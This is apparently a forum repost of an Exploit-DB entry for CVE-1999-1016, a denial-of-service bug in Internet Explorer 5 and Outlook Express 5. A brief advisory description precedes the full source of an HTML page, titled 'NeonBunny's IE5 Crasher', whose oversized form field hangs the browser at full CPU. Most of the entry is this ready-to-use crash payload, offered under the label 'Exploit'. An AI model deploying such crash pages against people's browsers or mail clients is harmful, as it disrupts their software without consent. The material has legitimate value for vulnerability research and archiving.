Exploit Microsoft Internet Explorer 5 - HTML Form Control Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19471
Проверка EDB
  1. Пройдено
Автор
NEON BUNNY
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-1999-1016
Дата публикации
1999-08-27
Microsoft Internet Explorer 5 - HTML Form Control Denial of Service
HTML:
Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 HTML Form Control DoS

source: https://www.securityfocus.com/bid/606/info

Certain Microsoft applications (IE5, Outlook Express 5) are unable to display large HTML form fields within HTML tables. Attempts to view the offending table will cause the application to "hang" and consume 100% CPU resources until the application is closed. 

---{START SOURCE}---

<html>

<head>
<title>NeonBunny's IE5 Crasher</title>
</head>

<body>

<form method="POST">

<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>

</form>
</body>
</html>

---{STOP SOURCE}---
 
Источник
www.exploit-db.com

Похожие темы